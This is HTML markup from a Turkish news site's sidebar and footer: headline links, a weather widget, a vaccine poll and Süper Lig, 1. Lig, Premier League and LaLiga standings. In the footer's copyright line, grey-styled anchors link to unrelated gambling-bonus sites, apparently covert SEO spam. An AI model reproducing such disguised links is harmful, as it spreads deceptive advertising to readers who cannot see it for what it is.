                            <a href="https://www.gaste24.com/gundem/necip-hablemitoglu-suikasti-iddianamesinde-ikinci-suikast-h201290.html" title="Necip Hablemitoğlu suikastı iddianamesinde &#039;ikinci suikast&#039; olabileceği şüphesi"
                                >
                                Necip Hablemitoğlu suikastı iddianamesinde &#039;ikinci suikast&#039; olabileceği şüphesi                            </a>
                        </h6>
                    </div>
                                        <div class="col-4">
                        <a href="https://www.gaste24.com/3-sayfa/otomobil-tira-arkadan-carpti-3-olu-h201162.html" title="Otomobil, tıra arkadan çarptı: 3 ölü"
                            >
                            <img class="img-fluid mb-2 lazyload" src="https://www.gaste24.com/_themes/hs-elegant/images/space.png"
                                data-src="https://www.gaste24.com/images/resize/100/194x116/haberler/2022/11/otomobil_tira_arkadan_carpti_3_olu_h201162_e6706.jpg" alt="Otomobil, tıra arkadan çarptı: 3 ölü">
                        </a>
                        <h6>
                            <a href="https://www.gaste24.com/3-sayfa/otomobil-tira-arkadan-carpti-3-olu-h201162.html" title="Otomobil, tıra arkadan çarptı: 3 ölü"
                                >
                                Otomobil, tıra arkadan çarptı: 3 ölü                            </a>
                        </h6>
                    </div>
                                    </div>
            </div>
        </div>
                                    </div>
</div>
                                    </div>
                <!-- Sidebar solundaki ana bölüm bitti -->
                <!-- SIDEBAR BOLUMU -->
                <div class="col-4">
                                        <div class="my-2 text-center " data-name="tb_block" data-field="200"><a href="https://www.gaste24.com/banner.php?id=35" target="_blank" rel="nofollow"><img src="https://www.gaste24.com/thumb.php?src=https://www.gaste24.com/images/banner/Huma-18-gaste24.jpg&w=300&h=250&q=80" width="300" height="250" style="width:300px;height: 250px;border:0" alt="banner35" class="img-responsive"/></a></div><!-- İLGİLİ HABERLER -->
<div id="similar-news" class="mb-3">
    <div class="media bg-white shadow-sm mb-2">
    <a href="https://www.gaste24.com/gundem/suleyman-soylu-bir-kadina-siddete-bir-olume-dahi-tahammulumuz-h201503.html" title="Süleyman Soylu: &#039;Bir kadına şiddete, bir ölüme dahi tahammülümüz yoktur&#039;">
      <img alt="Süleyman Soylu: &#039;Bir kadına şiddete, bir ölüme dahi tahammülümüz yoktur&#039;" class="img-fluid align-self-center lazyload" src="https://www.gaste24.com/_themes/hs-elegant/images/space.png" data-src="https://www.gaste24.com/images/resize/100/135x87/haberler/thumbs/2022/11/suleyman_soylu_bir_kadina_siddete_bir_olume_dahi_tahammulumuz_yoktur_h201503_50683.jpg">
    </a>
    <div class="media-body align-self-center p-2">
      <h6>
        <a href="https://www.gaste24.com/gundem/suleyman-soylu-bir-kadina-siddete-bir-olume-dahi-tahammulumuz-h201503.html" title="Süleyman Soylu: &#039;Bir kadına şiddete, bir ölüme dahi tahammülümüz yoktur&#039;">
          Süleyman Soylu: &#039;Bir kadına şiddete, bir ölüme dahi tahammülümüz yoktur&#039;        </a>
      </h6>
    </div>
  </div>
    <div class="media bg-white shadow-sm mb-2">
    <a href="https://www.gaste24.com/gundem/istiklal-caddesi-ndeki-yeni-onlemler-esnafa-anlatildi-h201502.html" title="İstiklal Caddesi&#039;ndeki yeni önlemler esnafa anlatıldı">
      <img alt="İstiklal Caddesi&#039;ndeki yeni önlemler esnafa anlatıldı" class="img-fluid align-self-center lazyload" src="https://www.gaste24.com/_themes/hs-elegant/images/space.png" data-src="https://www.gaste24.com/images/resize/100/135x87/haberler/thumbs/2022/11/istiklal_caddesi_ndeki_yeni_onlemler_esnafa_anlatildi_h201502_6fb5e.jpg">
    </a>
    <div class="media-body align-self-center p-2">
      <h6>
        <a href="https://www.gaste24.com/gundem/istiklal-caddesi-ndeki-yeni-onlemler-esnafa-anlatildi-h201502.html" title="İstiklal Caddesi&#039;ndeki yeni önlemler esnafa anlatıldı">
          İstiklal Caddesi&#039;ndeki yeni önlemler esnafa anlatıldı        </a>
      </h6>
    </div>
  </div>
    <div class="media bg-white shadow-sm mb-2">
    <a href="https://www.gaste24.com/gundem/kades-i-indiren-kadin-sayisi-4-milyonu-gecti-h201501.html" title="KADES&#039;i indiren kadın sayısı 4 milyonu geçti">
      <img alt="KADES&#039;i indiren kadın sayısı 4 milyonu geçti" class="img-fluid align-self-center lazyload" src="https://www.gaste24.com/_themes/hs-elegant/images/space.png" data-src="https://www.gaste24.com/images/resize/100/135x87/haberler/thumbs/2022/11/kades_i_indiren_kadin_sayisi_4_milyonu_gecti_h201501_22470.jpg">
    </a>
    <div class="media-body align-self-center p-2">
      <h6>
        <a href="https://www.gaste24.com/gundem/kades-i-indiren-kadin-sayisi-4-milyonu-gecti-h201501.html" title="KADES&#039;i indiren kadın sayısı 4 milyonu geçti">
          KADES&#039;i indiren kadın sayısı 4 milyonu geçti        </a>
      </h6>
    </div>
  </div>
    <div class="media bg-white shadow-sm mb-2">
    <a href="https://www.gaste24.com/gundem/erdogan-guclu-turkiye-yi-insa-edene-kadar-mucadelemizi-h201495.html" title="Erdoğan: &#039;Güçlü Türkiye&#039;yi inşa edene kadar mücadelemizi sürdüreceğiz&#039;">
      <img alt="Erdoğan: &#039;Güçlü Türkiye&#039;yi inşa edene kadar mücadelemizi sürdüreceğiz&#039;" class="img-fluid align-self-center lazyload" src="https://www.gaste24.com/_themes/hs-elegant/images/space.png" data-src="https://www.gaste24.com/images/resize/100/135x87/haberler/thumbs/2022/11/erdogan_guclu_turkiye_yi_insa_edene_kadar_mucadelemizi_surdurecegiz_h201495_3fd7e.jpg">
    </a>
    <div class="media-body align-self-center p-2">
      <h6>
        <a href="https://www.gaste24.com/gundem/erdogan-guclu-turkiye-yi-insa-edene-kadar-mucadelemizi-h201495.html" title="Erdoğan: &#039;Güçlü Türkiye&#039;yi inşa edene kadar mücadelemizi sürdüreceğiz&#039;">
          Erdoğan: &#039;Güçlü Türkiye&#039;yi inşa edene kadar mücadelemizi sürdüreceğiz&#039;        </a>
      </h6>
    </div>
  </div>
    <div class="media bg-white shadow-sm">
    <a href="https://www.gaste24.com/gundem/sehirli-derneginden-depreme-yonelik-risk-algisini-olcme-raporu-h201488.html" title="Şehirli Derneği&#39;nden depreme yönelik risk algısını ölçme raporu">
      <img alt="Şehirli Derneği&#39;nden depreme yönelik risk algısını ölçme raporu" class="img-fluid align-self-center lazyload" src="https://www.gaste24.com/_themes/hs-elegant/images/space.png" data-src="https://www.gaste24.com/images/resize/100/135x87/haberler/thumbs/2022/11/sehirli_dernegi_nden_depreme_yonelik_risk_algisini_olcme_raporu_h201488_cc0a8.jpg">
    </a>
    <div class="media-body align-self-center p-2">
      <h6>
        <a href="https://www.gaste24.com/gundem/sehirli-derneginden-depreme-yonelik-risk-algisini-olcme-raporu-h201488.html" title="Şehirli Derneği&#39;nden depreme yönelik risk algısını ölçme raporu">
          Şehirli Derneği&#39;nden depreme yönelik risk algısını ölçme raporu        </a>
      </h6>
    </div>
  </div>
  </div>
<!-- HAVA DURUMU -->
<div id="weather-widget" class="mb-3">
  <div class="card shadow-sm bg-info">
    <div class="card-body">
      <div class="row">
        <div class="col-6 weather-degree text-light" data-name="weather-degree">
          <i class="wi wi- text-warning"></i>         </div>
        <div class="col-6 weather-city pt-3">
          <div class="form-group text-center">
            <select data-name="weather-select" class="mb-1">
                              <option value="TUXX0061" >Adana</option>
                              <option value="9267066" >Adıyaman</option>
                              <option value="TUXX0046" >Afyon</option>
                              <option value="771" >Ağrı</option>
                              <option value="901" >Aksaray</option>
                              <option value="1412" >Amasya</option>
                              <option value="TUXX0002" >Ankara</option>
                              <option value="TUXX0004" >Antalya</option>
                              <option value="1885" >Ardahan</option>
                              <option value="9264197" >Artvin</option>
                              <option value="TUXX0051" >Aydın</option>
                              <option value="TUXX0041" >Balıkesir</option>
                              <option value="3037" >Bartın</option>
                              <option value="9261679" >Batman</option>
                              <option value="3200" >Bayburt</option>
                              <option value="3946" >Bilecik</option>
                              <option value="9260548" >Bingöl</option>
                              <option value="4045" >Bitlis</option>
                              <option value="TUXX0032" >Bolu</option>
                              <option value="5249" >Burdur</option>
                              <option value="TUXX0039" >Bursa</option>
                              <option value="TUXX0037" >Çanakkale</option>
                              <option value="9258078" >Çankırı</option>
                              <option value="TUXX0033" >Çorum</option>
                              <option value="8899" >Denizli</option>
                              <option value="TUXX0010" >Diyarbakır</option>
                              <option value="9252670" >Düzce</option>
                              <option value="TUXX0030" >Edirne</option>
                              <option value="TUXX0049" >Elazığ</option>
                              <option value="TUXX0035" >Erzincan</option>
                              <option value="TUXX0013" >Erzurum</option>
                              <option value="TUXX0040" >Eskişehir</option>
                              <option value="TUXX0055" >Gaziantep</option>
                              <option value="12125" >Giresun</option>
                              <option value="9248871" >Gümüşhane</option>
                              <option value="9255950" >Hakkari</option>
                              <option value="1694" >Hatay</option>
                              <option value="9245907" >Iğdır</option>
                              <option value="TUXX0052" >Isparta</option>
                              <option value="TUXX0014" selected>İstanbul</option>
                              <option value="TUXX0015" >İzmir</option>
                              <option value="15888" >K. Maraş</option>
                              <option value="9243604" >Karabük</option>
                              <option value="16174" >Karaman</option>
                              <option value="743952" >Kars</option>
                              <option value="16274" >Kastamonu</option>
                              <option value="16345" >Kayseri</option>
                              <option value="TUXX0019" >Kırıkkale</option>
                              <option value="16847" >Kırklareli</option>
                              <option value="TUXX0042" >Kırşehir</option>
                              <option value="16700" >Kilis</option>
                              <option value="TUXX0017" >Kocaeli</option>
                              <option value="TUXX0053" >Konya</option>
                              <option value="17542" >Kütahya</option>
                              <option value="19917" >Malatya</option>
                              <option value="20103" >Manisa</option>
                              <option value="20271" >Mardin</option>
                              <option value="14693" >Mersin</option>
                              <option value="TUXX0057" >Muğla</option>
                              <option value="TUXX0062" >Muş</option>
                              <option value="TUXX0065" >Nevşehir</option>
                              <option value="23341" >Niğde</option>
                              <option value="24553" >Ordu</option>
                              <option value="24703" >Osmaniye</option>
                              <option value="27911" >Rize</option>
                              <option value="TUXX0022" >Sakarya</option>
                              <option value="TUXX0023" >Samsun</option>
                              <option value="TUXX0050" >Siirt</option>
                              <option value="30965" >Sinop</option>
                              <option value="TUXX0034" >Sivas</option>
                              <option value="34552" >Şanlıurfa</option>
                              <option value="10034630" >Şırnak</option>
                              <option value="TUXX0031" >Tekirdağ</option>
                              <option value="33558" >Tokat</option>
                              <option value="TUXX0029" >Trabzon</option>
                              <option value="9226242" >Tunceli</option>
                              <option value="TUXX0045" >Uşak</option>
                              <option value="TUXX0043" >Van</option>
                              <option value="9250659" >Yalova</option>
                              <option value="37318" >Yozgat</option>
                              <option value="TUXX0028" >Zonguldak</option>
                              <option value="10208812" >Kıbrıs</option>
                              <option value="10700" >Famagusta</option>
                              <option value="23317" >Girne</option>
                              <option value="7261129" >Güzelyurt</option>
                              <option value="23317" >Lefkoşa</option>
                          </select>
          </div>
        </div>
        <div class="col-12">
          <div class="btn btn-outline-light btn-block text-uppercase text-center font-weight-light disabled" data-name="weather-desc"></div>
        </div>
      </div>
    </div>
  </div>
</div>
<!-- ANKET -->
<div id="survey" class="mb-3" data-survey="3">
  <div class="card shadow-sm">
    <div class="card-header bg-white">
      <span class="first-word widget-title text-info text-uppercase">Günün Anketi</span>
      <a class="btn btn-default btn-sm float-right text-uppercase" href="https://www.gaste24.com/anketler.html" title="Anketler">
        Tümü      </a>
    </div>
    <div class="card-body">
              <img src="https://www.gaste24.com/_themes/hs-elegant/images/space.png" data-src="https://www.gaste24.com/images/anketler/3/yerli-asi-mi-yabanci-asi-mi-kullanmayi-tercih-edersiniz_3.jpg" alt="Yerli veya yabancı aşılardan hangisini kullanmayı tercih ederdiniz?" class="img-fluid mb-2 lazyload"/>
            <h5 class="card-title">Yerli veya yabancı aşılardan hangisini kullanmayı tercih ederdiniz?</h5>
              <div class="survey-options">
          <form id="survey_form_3">
            <input type="hidden" name="aid" value="3">
                          <div class="form-check m-1">
                <input class="form-check-input" type="radio" name="OY3" id="survey-option-3-7" value="7">
                <label class="form-check-label" for="survey-option-3-7">
                  Yerli aşı                </label>
              </div>
                          <div class="form-check m-1">
                <input class="form-check-input" type="radio" name="OY3" id="survey-option-3-8" value="8">
                <label class="form-check-label" for="survey-option-3-8">
                  Yabancı aşı                </label>
              </div>
                      </form>
          <small class="alert alert-warning mt-2" style="display:none;margin-bottom:0">Oy kullanmak için bir seçeneği işaretleyin!</small>
          <small class="alert alert-danger mt-2" style="display:none;margin-bottom:0">Bu anket için daha önce oy kullandınız!</small>
          <div class="alert alert-success mt-2" style="display:none;margin-bottom:0">Başarılı bir şekilde oyunuzu kullandınız.</div>
          <div class="col-auto mt-3">
            <button type="button" data-id="3" data-results="1" class="btn btn-success vote text-uppercase">Oy Kullan</button>
                          <button class="btn btn-warning text-uppercase results float-right" type="button" data-id="3">Sonuçlar</button>
                      </div>
        </div>
          </div>
  </div>
</div>
<div class="my-2 text-center " data-name="tb_block" data-field="204"><a href="https://www.gaste24.com/banner.php?id=21" target="_blank" rel="nofollow"><img src="https://www.gaste24.com/thumb.php?src=https://www.gaste24.com/images/banner/fidan-gaste24-banner.jpg&w=300&h=250&q=80" width="300" height="250" style="width:300px;height: 250px;border:0" alt="banner21" class="img-responsive"/></a></div><!-- PUAN DURUMU -->
<div id="league" class="mb-3">
  <div class="card shadow-sm">
    <div class="card-header bg-white">
      <span class="first-word widget-title text-info text-uppercase">Puan Durumu</span>
    </div>
    <div class="card-body">
      <ul class="nav nav-pills nav-justified mb-3" role="tablist">
                <li class="nav-item">
          <a class="nav-link active  bg-transparent" id="league-st-super-lig-tab" data-toggle="pill" href="#league-st-super-lig" role="tab" aria-controls="league-st-super-lig" aria-selected="true">
            <img src="https://www.gaste24.com/_themes/hs-elegant/images/space.png" data-src="https://www.gaste24.com/_themes/hs-elegant/images/st-super-lig.png" alt="Spor Toto Süper Lig" class="img-fluid lazyload">
          </a>
        </li>
                <li class="nav-item">
          <a class="nav-link  bg-transparent" id="league-ptt-1-lig-tab" data-toggle="pill" href="#league-ptt-1-lig" role="tab" aria-controls="league-ptt-1-lig" aria-selected="true">
            <img src="https://www.gaste24.com/_themes/hs-elegant/images/space.png" data-src="https://www.gaste24.com/_themes/hs-elegant/images/ptt-1-lig.png" alt="Spor Toto 1. Lig" class="img-fluid lazyload">
          </a>
        </li>
                <li class="nav-item">
          <a class="nav-link  bg-transparent" id="league-ingiltere-premier-ligi-tab" data-toggle="pill" href="#league-ingiltere-premier-ligi" role="tab" aria-controls="league-ingiltere-premier-ligi" aria-selected="true">
            <img src="https://www.gaste24.com/_themes/hs-elegant/images/space.png" data-src="https://www.gaste24.com/_themes/hs-elegant/images/ingiltere-premier-ligi.png" alt="İngiltere Premier Ligi" class="img-fluid lazyload">
          </a>
        </li>
                <li class="nav-item">
          <a class="nav-link  bg-transparent" id="league-ispanya-la-liga-tab" data-toggle="pill" href="#league-ispanya-la-liga" role="tab" aria-controls="league-ispanya-la-liga" aria-selected="true">
            <img src="https://www.gaste24.com/_themes/hs-elegant/images/space.png" data-src="https://www.gaste24.com/_themes/hs-elegant/images/ispanya-la-liga.png" alt="İspanya LaLiga" class="img-fluid lazyload">
          </a>
        </li>
              </ul>
      <div class="tab-content">
                  <div class="tab-pane fade show active " id="league-st-super-lig" role="tabpanel" aria-labelledby="league-st-super-lig-tab">
          <table class="table table-sm table-striped table-hover mb-0">
            <thead>
              <tr>
                <th class="text-uppercase">Takımlar</th>
                <th class="text-uppercase">O</th>
                <th class="text-uppercase">P</th>
              </tr>
            </thead>
            <tbody>
                            <tr>
                <td>1. Fenerbahçe</td>
                <td>13</td>
                <td>29</td>
              </tr>
                            <tr>
                <td>2. Galatasaray</td>
                <td>13</td>
                <td>27</td>
              </tr>
                            <tr>
                <td>3. Adana Demirspor</td>
                <td>13</td>
                <td>24</td>
              </tr>
                            <tr>
                <td>4. Konyaspor</td>
                <td>14</td>
                <td>24</td>
              </tr>
                            <tr>
                <td>5. Başakşehir</td>
                <td>13</td>
                <td>24</td>
              </tr>
                            <tr>
                <td>6. Kayserispor</td>
                <td>14</td>
                <td>23</td>
              </tr>
                            <tr>
                <td>7. Trabzonspor</td>
                <td>13</td>
                <td>23</td>
              </tr>
                            <tr>
                <td>8. Beşiktaş</td>
                <td>13</td>
                <td>22</td>
              </tr>
                            <tr>
                <td>9. Alanyaspor</td>
                <td>14</td>
                <td>17</td>
              </tr>
                            <tr>
                <td>10. Gaziantep FK</td>
                <td>13</td>
                <td>16</td>
              </tr>
                            <tr>
                <td>11. Antalyaspor</td>
                <td>12</td>
                <td>16</td>
              </tr>
                            <tr>
                <td>12. Giresunspor</td>
                <td>13</td>
                <td>15</td>
              </tr>
                            <tr>
                <td>13. Kasımpaşa</td>
                <td>13</td>
                <td>15</td>
              </tr>
                            <tr>
                <td>14. Hatayspor</td>
                <td>13</td>
                <td>14</td>
              </tr>
                            <tr>
                <td>15. Karagümrük</td>
                <td>13</td>
                <td>13</td>
              </tr>
                            <tr>
                <td>16. Ankaragücü</td>
                <td>13</td>
                <td>13</td>
              </tr>
                            <tr>
                <td>17. Sivasspor</td>
                <td>14</td>
                <td>11</td>
              </tr>
                            <tr>
                <td>18. İstanbulspor</td>
                <td>13</td>
                <td>8</td>
              </tr>
                            <tr>
                <td>19. Ümraniye</td>
                <td>13</td>
                <td>7</td>
              </tr>
                          </tbody>
          </table>
        </div>
                  <div class="tab-pane fade show " id="league-ptt-1-lig" role="tabpanel" aria-labelledby="league-ptt-1-lig-tab">
          <table class="table table-sm table-striped table-hover mb-0">
            <thead>
              <tr>
                <th class="text-uppercase">Takımlar</th>
                <th class="text-uppercase">O</th>
                <th class="text-uppercase">P</th>
              </tr>
            </thead>
            <tbody>
                            <tr>
                <td>1. Eyüpspor</td>
                <td>14</td>
                <td>33</td>
              </tr>
                            <tr>
                <td>2. Pendikspor</td>
                <td>13</td>
                <td>24</td>
              </tr>
                            <tr>
                <td>3. Keçiörengücü</td>
                <td>13</td>
                <td>24</td>
              </tr>
                            <tr>
                <td>4. Samsunspor</td>
                <td>13</td>
                <td>23</td>
              </tr>
                            <tr>
                <td>5. Rizespor</td>
                <td>13</td>
                <td>22</td>
              </tr>
                            <tr>
                <td>6. Boluspor</td>
                <td>13</td>
                <td>22</td>
              </tr>
                            <tr>
                <td>7. Bodrumspor</td>
                <td>13</td>
                <td>21</td>
              </tr>
                            <tr>
                <td>8. Manisa FK</td>
                <td>13</td>
                <td>20</td>
              </tr>
                            <tr>
                <td>9. Sakaryaspor</td>
                <td>14</td>
                <td>19</td>
              </tr>
                            <tr>
                <td>10. Altay</td>
                <td>14</td>
                <td>18</td>
              </tr>
                            <tr>
                <td>11. Bandırmaspor</td>
                <td>13</td>
                <td>18</td>
              </tr>
                            <tr>
                <td>12. Adanaspor</td>
                <td>14</td>
                <td>17</td>
              </tr>
                            <tr>
                <td>13. Göztepe</td>
                <td>13</td>
                <td>17</td>
              </tr>
                            <tr>
                <td>14. Tuzlaspor</td>
                <td>13</td>
                <td>15</td>
              </tr>
                            <tr>
                <td>15. Erzurumspor</td>
                <td>13</td>
                <td>14</td>
              </tr>
                            <tr>
                <td>16. Altınordu</td>
                <td>13</td>
                <td>12</td>
              </tr>
                            <tr>
                <td>17. Ö.K Yeni Malatya</td>
                <td>14</td>
                <td>10</td>
              </tr>
                            <tr>
                <td>18. Gençlerbirliği</td>
                <td>13</td>
                <td>7</td>
              </tr>
                            <tr>
                <td>19. Denizlispor</td>
                <td>13</td>
                <td>5</td>
              </tr>
                          </tbody>
          </table>
        </div>
                  <div class="tab-pane fade show " id="league-ingiltere-premier-ligi" role="tabpanel" aria-labelledby="league-ingiltere-premier-ligi-tab">
          <table class="table table-sm table-striped table-hover mb-0">
            <thead>
              <tr>
                <th class="text-uppercase">Takımlar</th>
                <th class="text-uppercase">O</th>
                <th class="text-uppercase">P</th>
              </tr>
            </thead>
            <tbody>
                            <tr>
                <td>1. Arsenal</td>
                <td>14</td>
                <td>37</td>
              </tr>
                            <tr>
                <td>2. M.City</td>
                <td>14</td>
                <td>32</td>
              </tr>
                            <tr>
                <td>3. Newcastle</td>
                <td>15</td>
                <td>30</td>
              </tr>
                            <tr>
                <td>4. Tottenham</td>
                <td>15</td>
                <td>29</td>
              </tr>
                            <tr>
                <td>5. M. United</td>
                <td>14</td>
                <td>26</td>
              </tr>
                            <tr>
                <td>6. Liverpool</td>
                <td>14</td>
                <td>22</td>
              </tr>
                            <tr>
                <td>7. Brighton</td>
                <td>14</td>
                <td>21</td>
              </tr>
                            <tr>
                <td>8. Chelsea</td>
                <td>14</td>
                <td>21</td>
              </tr>
                            <tr>
                <td>9. Fulham</td>
                <td>15</td>
                <td>19</td>
              </tr>
                            <tr>
                <td>10. Brentford</td>
                <td>15</td>
                <td>19</td>
              </tr>
                            <tr>
                <td>11. Crystal Palace</td>
                <td>14</td>
                <td>19</td>
              </tr>
                            <tr>
                <td>12. Aston Villa</td>
                <td>15</td>
                <td>18</td>
              </tr>
                            <tr>
                <td>13. Leicester City</td>
                <td>15</td>
                <td>17</td>
              </tr>
                            <tr>
                <td>14. Bournemouth</td>
                <td>15</td>
                <td>16</td>
              </tr>
                            <tr>
                <td>15. Leeds United</td>
                <td>14</td>
                <td>15</td>
              </tr>
                            <tr>
                <td>16. West Ham United</td>
                <td>15</td>
                <td>14</td>
              </tr>
                            <tr>
                <td>17. Everton</td>
                <td>15</td>
                <td>14</td>
              </tr>
                            <tr>
                <td>18. Nottingham Forest</td>
                <td>15</td>
                <td>13</td>
              </tr>
                            <tr>
                <td>19. Southampton</td>
                <td>15</td>
                <td>12</td>
              </tr>
                            <tr>
                <td>20. Wolves</td>
                <td>15</td>
                <td>10</td>
              </tr>
                          </tbody>
          </table>
        </div>
                  <div class="tab-pane fade show " id="league-ispanya-la-liga" role="tabpanel" aria-labelledby="league-ispanya-la-liga-tab">
          <table class="table table-sm table-striped table-hover mb-0">
            <thead>
              <tr>
                <th class="text-uppercase">Takımlar</th>
                <th class="text-uppercase">O</th>
                <th class="text-uppercase">P</th>
              </tr>
            </thead>
            <tbody>
                            <tr>
                <td>1. Barcelona</td>
                <td>14</td>
                <td>37</td>
              </tr>
                            <tr>
                <td>2. Real Madrid</td>
                <td>14</td>
                <td>35</td>
              </tr>
                            <tr>
                <td>3. Real Sociedad</td>
                <td>14</td>
                <td>26</td>
              </tr>
                            <tr>
                <td>4. Athletic Bilbao</td>
                <td>14</td>
                <td>24</td>
              </tr>
                            <tr>
                <td>5. Atletico Madrid</td>
                <td>14</td>
                <td>24</td>
              </tr>
                            <tr>
                <td>6. Real Betis</td>
                <td>14</td>
                <td>24</td>
              </tr>
                            <tr>
                <td>7. Osasuna</td>
                <td>14</td>
                <td>23</td>
              </tr>
                            <tr>
                <td>8. Rayo Vallecano</td>
                <td>14</td>
                <td>22</td>
              </tr>
                            <tr>
                <td>9. Villarreal</td>
                <td>14</td>
                <td>21</td>
              </tr>
                            <tr>
                <td>10. Valencia</td>
                <td>14</td>
                <td>19</td>
              </tr>
                            <tr>
                <td>11. Mallorca</td>
                <td>14</td>
                <td>19</td>
              </tr>
                            <tr>
                <td>12. Real Valladolid</td>
                <td>14</td>
                <td>17</td>
              </tr>
                            <tr>
                <td>13. Girona</td>
                <td>14</td>
                <td>16</td>
              </tr>
                            <tr>
                <td>14. Almeria</td>
                <td>14</td>
                <td>16</td>
              </tr>
                            <tr>
                <td>15. Getafe</td>
                <td>14</td>
                <td>14</td>
              </tr>
                            <tr>
                <td>16. Espanyol</td>
                <td>14</td>
                <td>12</td>
              </tr>
                            <tr>
                <td>17. Celta Vigo</td>
                <td>14</td>
                <td>12</td>
              </tr>
                            <tr>
                <td>18. Sevilla</td>
                <td>14</td>
                <td>11</td>
              </tr>
                            <tr>
                <td>19. Cadiz</td>
                <td>14</td>
                <td>11</td>
              </tr>
                            <tr>
                <td>20. Elche</td>
                <td>14</td>
                <td>4</td>
              </tr>
                          </tbody>
          </table>
        </div>
              </div>
    </div>
  </div>
</div>
<div class="my-2 text-center " data-name="tb_block" data-field="208"><a href="https://www.gaste24.com/banner.php?id=23" target="_blank" rel="nofollow"><img src="https://www.gaste24.com/images/banner/Sequence-01_1-1.gif" width="300" height="300" style="width:300px;height: 300px;border:0" alt="banner23" class="img-responsive"/></a></div><!-- SAYFALAR -->
<div id="similar-news" class="mb-3">
  <div class="card shadow-sm">
    <div class="card-header bg-white">
      <span class="first-word widget-title text-info text-uppercase">Sayfalar</span>
      <a class="btn btn-default btn-sm float-right text-uppercase" href="https://www.gaste24.com/sayfalar.html" title="Sayfalar">Tümü</a>
    </div>
    <div class="card-body">
            <div class="media bg-white shadow-sm mb-2">
        <div class="media-body align-self-center p-2">
          <h6>
            <a href="https://www.gaste24.com/gizlilik-ve-kisisel-verilerin-korunmasi-politikasi-s2.html" title="GİZLİLİK VE KİŞİSEL VERİLERİN KORUNMASI POLİTİKASI">
              <i class="far fa-file-alt"></i> GİZLİLİK VE KİŞİSEL VERİLERİN KORUNMASI POLİTİKASI            </a>
          </h6>
        </div>
      </div>
            <div class="media bg-white shadow-sm mb-2">
        <div class="media-body align-self-center p-2">
          <h6>
            <a href="https://www.gaste24.com/cerez-politikamiz-s7.html" title="ÇEREZ POLİTİKAMIZ">
              <i class="far fa-file-alt"></i> ÇEREZ POLİTİKAMIZ            </a>
          </h6>
        </div>
      </div>
            <div class="media bg-white shadow-sm mb-2">
        <div class="media-body align-self-center p-2">
          <h6>
            <a href="https://www.gaste24.com/kisisel-verilerin-korunmasi-ve-islenmesi-hakkinda-aydinlatma-metni-s4.html" title="Kişisel Verilerin Korunması ve İşlenmesi Hakkında Aydınlatma Metni">
              <i class="far fa-file-alt"></i> Kişisel Verilerin Korunması ve İşlenmesi Hakkında Aydınlatma Metni            </a>
          </h6>
        </div>
      </div>
            <div class="media bg-white shadow-sm">
        <div class="media-body align-self-center p-2">
          <h6>
            <a href="https://www.gaste24.com/kullanim-kosullari-s3.html" title="KULLANIM KOŞULLARI">
              <i class="far fa-file-alt"></i> KULLANIM KOŞULLARI            </a>
          </h6>
        </div>
      </div>
          </div>
  </div>
</div>
                </div>
                <!-- Sidebar bitti -->
            </div>
        </div>
            </main>
    <a id="back-to-top" class="btn btn-lg btn-light border rounded-circle" href="#" title="Yukarı Git"><i
            class="fa fa-chevron-up"></i></a>
    <div id="footer" class="py-5 bg-dark">
    <div class="container">
        <div class="row">
            <div class="col-4 text-secondary">
                <div class="mb-3">
                    <img src="https://www.gaste24.com/_themes/hs-elegant/images/space.png"
                        data-src="https://www.gaste24.com/images/banner/gaste-logo-44_1.png" alt="Haber, Haberler, Son Dakika Gelişmeler | Gaste24"
                        class="img-fluid lazyload">
                </div>
                                <div>Bu sitede <a href="https://www.denemebonusu.live" title="bonus veren siteler" style="color: #6c757c">yayınlanan tüm materyalin</a> her hakkı mahfuzdur. Kaynak <a href="https://guncelgirisi.com" title="güncel siteler" style="color: #6c757c">gösterilmeden alıntılanamaz</a>.</div>
                                <div class="title-line my-3 bg-warning w-25"></div>
                                <div class="mt-2">
                    <i class="fas fa-map-marker-alt text-warning"> </i>Fetih Mahallesi, Tahralı Sokak, Kavakyeli A Blok, No:7 D:25, Ataşehir/İstanbul                </div>
                                                <div class="mt-2">
                    <i class="fas fa-phone text-warning"> </i>0216 339 45 45                </div>
                                                <div class="mt-2">
                    OKUR HATTI: 0552 324 3890                </div>
                                                <div class="mt-2">
                    <i class="far fa-envelope text-warning"> </i><a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="a0c9cec6cfe0c7c1d3d4c592948ec3cfcd">[email&#160;protected]</a>                </div>
                                <div class="mt-4">
                                        <a class="btn btn-light btn-sm" href="https://www.facebook.com/gaste24"
                        target="_blank" title="Facebook"><i class="fab fa-facebook-f text-primary"></i> </a>
                                                            <a class="btn btn-light btn-sm" href="https://twitter.com/gaste24com" target="_blank"
                        title="Twitter"><i class="fab fa-twitter text-info"></i> </a>
                                                                                                </div>
            </div>
            <div class="col-4">
  <h5 class="first-word text-white text-uppercase">Güncel Haberler</h5>
  <div class="title-line mt-2 mb-3 bg-warning w-25"></div>
    <div class="media mb-3">
    <img class="img-fluid lazyload" src="https://www.gaste24.com/_themes/hs-elegant/images/space.png" data-src="https://www.gaste24.com/images/resize/100/105x68/haberler/2022/11/suleyman_soylu_bir_kadina_siddete_bir_olume_dahi_tahammulumuz_yoktur_h201503_50683.jpg" alt="Süleyman Soylu: &#039;Bir kadına şiddete, bir ölüme dahi tahammülümüz yoktur&#039;" width="105">
    <div class="media-body p-3 align-self-center">
      <h6>
        <a href="https://www.gaste24.com/gundem/suleyman-soylu-bir-kadina-siddete-bir-olume-dahi-tahammulumuz-h201503.html" title="Süleyman Soylu: &#039;Bir kadına şiddete, bir ölüme dahi tahammülümüz yoktur&#039;" class="text-white-50">
          Süleyman Soylu: &#039;Bir kadına şiddete, bir ölüme dahi tahammülümüz yoktur&#039;        </a>
      </h6>
    </div>
  </div>
    <div class="media mb-3">
    <img class="img-fluid lazyload" src="https://www.gaste24.com/_themes/hs-elegant/images/space.png" data-src="https://www.gaste24.com/images/resize/100/105x68/haberler/2022/11/istiklal_caddesi_ndeki_yeni_onlemler_esnafa_anlatildi_h201502_6fb5e.jpg" alt="İstiklal Caddesi&#039;ndeki yeni önlemler esnafa anlatıldı" width="105">
    <div class="media-body p-3 align-self-center">
      <h6>
        <a href="https://www.gaste24.com/gundem/istiklal-caddesi-ndeki-yeni-onlemler-esnafa-anlatildi-h201502.html" title="İstiklal Caddesi&#039;ndeki yeni önlemler esnafa anlatıldı" class="text-white-50">
          İstiklal Caddesi&#039;ndeki yeni önlemler esnafa anlatıldı        </a>
      </h6>
    </div>
  </div>
    <div class="media mb-3">
